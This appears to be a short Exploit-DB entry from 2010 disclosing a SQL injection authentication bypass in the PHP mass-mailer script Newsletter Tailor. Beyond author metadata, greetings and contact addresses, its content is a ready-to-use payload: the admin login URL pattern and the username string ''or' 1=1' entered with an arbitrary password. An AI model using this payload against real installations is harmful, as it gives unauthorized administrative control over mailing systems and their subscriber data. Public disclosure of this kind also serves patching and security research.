NewsLetter Tailor - Authentication Bypass

EDB-ID:

11367

CVE:

N/A


Author:

ViRuSMaN

Type:

webapps


Platform:

PHP

Date:

2010-02-09


==============================================================================
[»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
[»] Newsletter Tailor (Auth Bypass) SQL Injection Vulnerability
==============================================================================

[»] Script: [ Newsletter Tailor ]
[»] Language: [ PHP ]
[»] Site page: [ A powerful Newsletter/ Mass Mailer script with built-in ftp client and wysiwyg editor ]
[»] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

[»] http://[target].com/[path]/admin/
[~] Username:'or' 1=1
[~] Password:ViRuSMaN


Author: ViRuSMaN <-

###########################################################################